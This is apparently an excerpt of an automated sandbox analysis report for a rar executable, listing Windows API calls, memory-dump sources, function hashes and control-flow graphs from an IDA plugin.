                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE20126B09BE289EB22DF25D8701FD27A1FB65788F650831EA4D87796DF3AD544C300

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF60E604AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF60E5DCC90), ref: 00007FF60E604AF5
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60492E
                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60496A
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E604993
                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,00007FF60E5F7E7D), ref: 00007FF60E60499F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                                • String ID: rarlng.dll
                                                                                                                                                                                                                                                • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                                • Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                • Instruction ID: 2a546c0f6d96a7acf6053da2a00e67824ee68d701b061107d4dcbf90b05265a7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6318132B28A7285FB749F61F8402E92760FB64784FA04135FA4D83695DF3DE549D700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E4736
                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E476B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E477A
                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E47A4
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,00007FF60E5E4620,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E47B2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 869497890-0
                                                                                                                                                                                                                                                • Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                • Instruction ID: 0bf80d8f367b8b19b516b80462d802fbe79013f8f388cb002f8db9812dfb99f7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67410332B18A9196EA699B35E4502E963A0FB697B4F100731FB7D833C5EF7CE1598700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                                                                                                                • Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                • Instruction ID: 1c73ef98cdc7e58576d727326e53de5f8e06b85e179a73970955791b0d9bd050
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA01622AB1866582E7509B26B5543296762EBD4FD0F288431EF4D83764CF7DD5468700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Char
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 751630497-0
                                                                                                                                                                                                                                                • Opcode ID: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
                                                                                                                                                                                                                                                • Instruction ID: c737c16f557b0e6f1853149be3512c7b086acebbda0691d43e05f5a5001a58b2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 186ef3fc3377d62e9400f60c1346a6d63701ca899d0dd8cde323f7fd028d12cd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F822E532B086A29AE756CF30D4611FE7BA0FB60748F644D31EA8D87299DE7DE941C740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 68d51678d7948748aabfc2228ef06bec8285962a52d5453e80891cee1563c769
                                                                                                                                                                                                                                                • Instruction ID: 33d037864b7e05d084a63812cd93f725526a7e242cfe7d376a7d3e7cec2c37f8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68d51678d7948748aabfc2228ef06bec8285962a52d5453e80891cee1563c769
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5713332B16A9182D709DF69E4053EC3391FB88B98F284135EF5CCB399EF79A0518790

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 635 7ff60e603ea8-7ff60e603f03 call 7ff60e61a5a0 call 7ff60e61c8a0 640 7ff60e603f05-7ff60e603f3e GetModuleFileNameW call 7ff60e5f4e14 call 7ff60e60a9c0 635->640 641 7ff60e603f40-7ff60e603f50 call 7ff60e60a9e8 635->641 645 7ff60e603f55-7ff60e603f79 call 7ff60e5e1874 call 7ff60e5e1e80 640->645 641->645 652 7ff60e604692-7ff60e6046c5 call 7ff60e5e18ac call 7ff60e61a610 645->652 653 7ff60e603f7f-7ff60e603f89 645->653 655 7ff60e603fae-7ff60e603feb call 7ff60e61ec70 * 2 653->655 656 7ff60e603f8b-7ff60e603fac call 7ff60e6011c0 * 2 653->656 668 7ff60e603fef-7ff60e603ff3 655->668 656->655 669 7ff60e6040f2-7ff60e604112 call 7ff60e5e22e0 call 7ff60e61eb90 668->669 670 7ff60e603ff9-7ff60e60402d call 7ff60e5e2440 call 7ff60e5e2150 668->670 669->652 679 7ff60e604118-7ff60e604131 call 7ff60e5e2150 669->679 680 7ff60e604033 670->680 681 7ff60e6040bc-7ff60e6040e2 call 7ff60e5e22e0 670->681 692 7ff60e604133-7ff60e604136 679->692 693 7ff60e604138-7ff60e60414b call 7ff60e61eb90 679->693 684 7ff60e60403a-7ff60e60403e 680->684 681->668 689 7ff60e6040e8-7ff60e6040ec 681->689 687 7ff60e604064-7ff60e604069 684->687 688 7ff60e604040-7ff60e604044 684->688 690 7ff60e60406b-7ff60e604070 687->690 691 7ff60e604097-7ff60e60409f 687->691 688->687 694 7ff60e604046-7ff60e60405e call 7ff60e622290 688->694 689->652 689->669 690->691 696 7ff60e604072-7ff60e604078 690->696 697 7ff60e6040a1 691->697 698 7ff60e6040b7 691->698 699 7ff60e60416f-7ff60e6041b1 call 7ff60e60a900 call 7ff60e61eb90 692->699 693->652 710 7ff60e604151-7ff60e60416c call 7ff60e60d54c call 7ff60e61eb88 693->710 706 7ff60e6040a3-7ff60e6040a7 694->706 707 7ff60e604060 694->707 703 7ff60e604093 696->703 704 7ff60e60407a-7ff60e604091 call 7ff60e621700 696->704 697->684 698->681 718 7ff60e6041b3-7ff60e6041bb call 7ff60e61eb88 699->718 719 7ff60e6041c0-7ff60e6041d5 699->719 703->691 704->703 716 7ff60e6040a9-7ff60e6040b5 704->716 706->698 707->687 710->699 716->681 718->652 722 7ff60e6045f0-7ff60e604624 call 7ff60e603884 call 7ff60e61eb88 * 2 719->722 723 7ff60e6041db 719->723 762 7ff60e60464a-7ff60e604691 call 7ff60e61ec70 * 2 722->762 763 7ff60e604626-7ff60e604648 call 7ff60e6011c0 * 2 722->763 726 7ff60e6041e1-7ff60e6041ee 723->726 728 7ff60e6041f4-7ff60e6041fa 726->728 729 7ff60e604508-7ff60e604513 726->729 730 7ff60e6041fc-7ff60e604202 728->730 731 7ff60e604208-7ff60e60420e 728->731 729->722 733 7ff60e604519-7ff60e604523 729->733 730->729 730->731 734 7ff60e604214-7ff60e60425c 731->734 735 7ff60e6043d0-7ff60e6043e0 call 7ff60e60a580 731->735 737 7ff60e604585-7ff60e604589 733->737 738 7ff60e604525-7ff60e60452b 733->738 739 7ff60e604261-7ff60e604264 734->739 758 7ff60e6044f0-7ff60e604503 735->758 759 7ff60e6043e6-7ff60e604414 call 7ff60e60a9e8 call 7ff60e62172c 735->759 741 7ff60e6045a3-7ff60e6045d4 call 7ff60e603884 737->741 742 7ff60e60458b-7ff60e60458f 737->742 744 7ff60e604531-7ff60e604539 738->744 745 7ff60e6045db-7ff60e6045de 738->745 749 7ff60e604268-7ff60e604270 739->749 741->745 742->741 751 7ff60e604591-7ff60e604597 742->751 746 7ff60e604573-7ff60e60457a 744->746 747 7ff60e60453b-7ff60e60453e 744->747 745->722 748 7ff60e6045e0-7ff60e6045e5 745->748 760 7ff60e60457e-7ff60e604583 746->760 755 7ff60e604540-7ff60e604543 747->755 756 7ff60e60456a-7ff60e604571 747->756 748->726 749->749 757 7ff60e604272-7ff60e604288 call 7ff60e621700 749->757 751->745 761 7ff60e604599-7ff60e6045a1 751->761 764 7ff60e604545-7ff60e604548 755->764 765 7ff60e604561-7ff60e604568 755->765 756->760 779 7ff60e6042a3 757->779 780 7ff60e60428a-7ff60e604295 757->780 758->729 759->758 787 7ff60e60441a-7ff60e6044a9 call 7ff60e60d840 call 7ff60e60a900 call 7ff60e60a8c4 call 7ff60e60a900 call 7ff60e6215fc 759->787 760->745 761->745 762->652 763->762 771 7ff60e60454a-7ff60e60454d 764->771 772 7ff60e604558-7ff60e60455f 764->772 765->760 771->751 777 7ff60e60454f-7ff60e604556 771->777 772->760 777->760 786 7ff60e6042a7-7ff60e6042be 779->786 780->779 784 7ff60e604297-7ff60e6042a1 780->784 784->786 786->739 788 7ff60e6042c0-7ff60e6042c2 786->788 822 7ff60e6044bf-7ff60e6044cf 787->822 823 7ff60e6044ab-7ff60e6044bb 787->823 790 7ff60e6042c4-7ff60e6042d6 call 7ff60e60a900 788->790 791 7ff60e6042e6 788->791 797 7ff60e6042db-7ff60e6042e1 790->797 791->735 792 7ff60e6042ec 791->792 795 7ff60e6042f1-7ff60e6042f7 792->795 799 7ff60e604300-7ff60e604303 795->799 800 7ff60e6042f9-7ff60e6042fe 795->800 798 7ff60e6045d6 797->798 798->745 799->795 800->799 803 7ff60e604305-7ff60e604314 800->803 805 7ff60e60433d-7ff60e604347 803->805 806 7ff60e604316-7ff60e604320 803->806 809 7ff60e60434d-7ff60e604378 call 7ff60e60d840 805->809 810 7ff60e6045ea-7ff60e6045ef call 7ff60e61a774 805->810 808 7ff60e604323-7ff60e604327 806->808 808->805 813 7ff60e604329-7ff60e60433b 808->813 819 7ff60e60439e-7ff60e6043cb call 7ff60e60470c 809->819 820 7ff60e60437a-7ff60e604399 call 7ff60e621764 809->820 810->722 813->805 813->808 819->797 820->797 826 7ff60e6044d2-7ff60e6044d8 822->826 823->822 828 7ff60e6044eb-7ff60e6044ee 826->828 829 7ff60e6044da-7ff60e6044e5 826->829 828->826 829->798 829->828
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileModuleNamesnprintfwcschr
                                                                                                                                                                                                                                                • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
                                                                                                                                                                                                                                                • API String ID: 602362809-1645646101
                                                                                                                                                                                                                                                • Opcode ID: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
                                                                                                                                                                                                                                                • Instruction ID: b635a2ac376262f797d62b56861353503aa4e43871b25ae4c81397b975d55771
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bace2d2c65f060087d1e392495a2526bf2bc97d135f43877d2507ce5e202d588
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE22D122A396B294EB31DB15E4502BE2361FF64784FA04136FA5EC76D5EF2CE904D340

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1405 7ff60e5d4fd0-7ff60e5d502d call 7ff60e61a5a0 1408 7ff60e5d502f-7ff60e5d5037 1405->1408 1409 7ff60e5d504d-7ff60e5d5055 1405->1409 1408->1409 1410 7ff60e5d5039-7ff60e5d504b call 7ff60e61c8a0 1408->1410 1411 7ff60e5d506e-7ff60e5d5089 call 7ff60e5f420c 1409->1411 1412 7ff60e5d5057-7ff60e5d5069 call 7ff60e5d481c 1409->1412 1410->1409 1410->1412 1418 7ff60e5d509f-7ff60e5d50b6 call 7ff60e60db08 1411->1418 1419 7ff60e5d508b-7ff60e5d509d call 7ff60e60a9c0 1411->1419 1412->1411 1424 7ff60e5d511b-7ff60e5d5131 call 7ff60e61c8a0 1418->1424 1425 7ff60e5d50b8-7ff60e5d50c3 call 7ff60e60a59c 1418->1425 1419->1424 1430 7ff60e5d5203-7ff60e5d520d call 7ff60e60aa48 1424->1430 1431 7ff60e5d5137-7ff60e5d513e 1424->1431 1425->1424 1432 7ff60e5d50c5-7ff60e5d50cf call 7ff60e5e3054 1425->1432 1440 7ff60e5d5212-7ff60e5d521c 1430->1440 1433 7ff60e5d5140-7ff60e5d5167 call 7ff60e5f3f98 1431->1433 1434 7ff60e5d516c-7ff60e5d51be call 7ff60e60aa1c call 7ff60e60aa48 call 7ff60e606e98 1431->1434 1432->1424 1441 7ff60e5d50d1-7ff60e5d5107 call 7ff60e60a9e8 call 7ff60e60a9c0 call 7ff60e5e3054 1432->1441 1433->1434 1491 7ff60e5d51d3-7ff60e5d51e8 call 7ff60e607a24 1434->1491 1443 7ff60e5d5222 1440->1443 1444 7ff60e5d52db-7ff60e5d52e0 1440->1444 1441->1424 1516 7ff60e5d5109-7ff60e5d5116 call 7ff60e60a9e8 1441->1516 1445 7ff60e5d532f-7ff60e5d5332 1443->1445 1446 7ff60e5d5228-7ff60e5d522d 1443->1446 1447 7ff60e5d5453-7ff60e5d5477 call 7ff60e5df00c call 7ff60e5df230 call 7ff60e5df09c 1444->1447 1448 7ff60e5d52e6-7ff60e5d52e9 1444->1448 1453 7ff60e5d5334 1445->1453 1454 7ff60e5d533b-7ff60e5d533e 1445->1454 1446->1445 1451 7ff60e5d5233-7ff60e5d5236 1446->1451 1510 7ff60e5d547c-7ff60e5d5483 1447->1510 1455 7ff60e5d52ef-7ff60e5d52f2 1448->1455 1456 7ff60e5d5379-7ff60e5d5382 1448->1456 1460 7ff60e5d5290-7ff60e5d5299 1451->1460 1461 7ff60e5d5238-7ff60e5d523b 1451->1461 1453->1454 1465 7ff60e5d5340 1454->1465 1466 7ff60e5d5347-7ff60e5d5358 call 7ff60e5c1230 call 7ff60e5c4858 1454->1466 1467 7ff60e5d52f4-7ff60e5d52f7 1455->1467 1468 7ff60e5d536c-7ff60e5d5374 call 7ff60e6081cc 1455->1468 1463 7ff60e5d5388-7ff60e5d538b 1456->1463 1464 7ff60e5d5449-7ff60e5d5451 call 7ff60e5feab8 1456->1464 1470 7ff60e5d52b2-7ff60e5d52bd 1460->1470 1471 7ff60e5d529b-7ff60e5d529e 1460->1471 1474 7ff60e5d5274-7ff60e5d528b call 7ff60e5c1230 call 7ff60e5c48ec 1461->1474 1475 7ff60e5d523d-7ff60e5d5240 1461->1475 1479 7ff60e5d5391-7ff60e5d5397 1463->1479 1480 7ff60e5d541b-7ff60e5d5433 call 7ff60e60ab1c 1463->1480 1464->1510 1465->1466 1524 7ff60e5d535d 1466->1524 1467->1447 1482 7ff60e5d52fd-7ff60e5d5300 1467->1482 1468->1510 1489 7ff60e5d52ce-7ff60e5d52d6 call 7ff60e5f55e0 1470->1489 1492 7ff60e5d52bf-7ff60e5d52c9 call 7ff60e60a9e8 1470->1492 1471->1489 1490 7ff60e5d52a0-7ff60e5d52a6 1471->1490 1541 7ff60e5d535e-7ff60e5d5362 call 7ff60e5c14fc 1474->1541 1475->1447 1485 7ff60e5d5246-7ff60e5d5249 1475->1485 1496 7ff60e5d540c-7ff60e5d5419 call 7ff60e5f54f8 call 7ff60e5f51e4 1479->1496 1497 7ff60e5d5399-7ff60e5d539c 1479->1497 1480->1510 1523 7ff60e5d5435-7ff60e5d5447 call 7ff60e5fbbd4 1480->1523 1482->1445 1483 7ff60e5d5302-7ff60e5d5305 1482->1483 1498 7ff60e5d5322-7ff60e5d532a call 7ff60e5e67e0 1483->1498 1499 7ff60e5d5307-7ff60e5d530a 1483->1499 1485->1445 1501 7ff60e5d524f-7ff60e5d5252 1485->1501 1489->1510 1506 7ff60e5d5313-7ff60e5d531d call 7ff60e5d481c 1490->1506 1507 7ff60e5d52a8-7ff60e5d52ad call 7ff60e5d7214 1490->1507 1543 7ff60e5d51c0-7ff60e5d51ce call 7ff60e60aa48 1491->1543 1544 7ff60e5d51ea-7ff60e5d5201 call 7ff60e606f68 call 7ff60e5c14c0 1491->1544 1492->1489 1496->1510 1513 7ff60e5d539e-7ff60e5d53a1 1497->1513 1514 7ff60e5d53ef-7ff60e5d5401 call 7ff60e5d45c8 1497->1514 1498->1510 1499->1447 1515 7ff60e5d5310 1499->1515 1501->1447 1518 7ff60e5d5258-7ff60e5d525b 1501->1518 1506->1510 1507->1510 1529 7ff60e5d5485-7ff60e5d548c call 7ff60e5d8444 1510->1529 1530 7ff60e5d5491-7ff60e5d54bc call 7ff60e61a610 1510->1530 1513->1506 1528 7ff60e5d53a7-7ff60e5d53d5 call 7ff60e5d45c8 call 7ff60e60ab1c 1513->1528 1514->1496 1515->1506 1516->1424 1534 7ff60e5d526b-7ff60e5d5272 1518->1534 1535 7ff60e5d525d-7ff60e5d5260 1518->1535 1523->1510 1524->1541 1528->1510 1560 7ff60e5d53db-7ff60e5d53ea call 7ff60e5fba9c 1528->1560 1529->1530 1534->1489 1535->1498 1548 7ff60e5d5266 1535->1548 1556 7ff60e5d5367 1541->1556 1543->1491 1544->1440 1548->1515 1556->1510 1560->1510
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
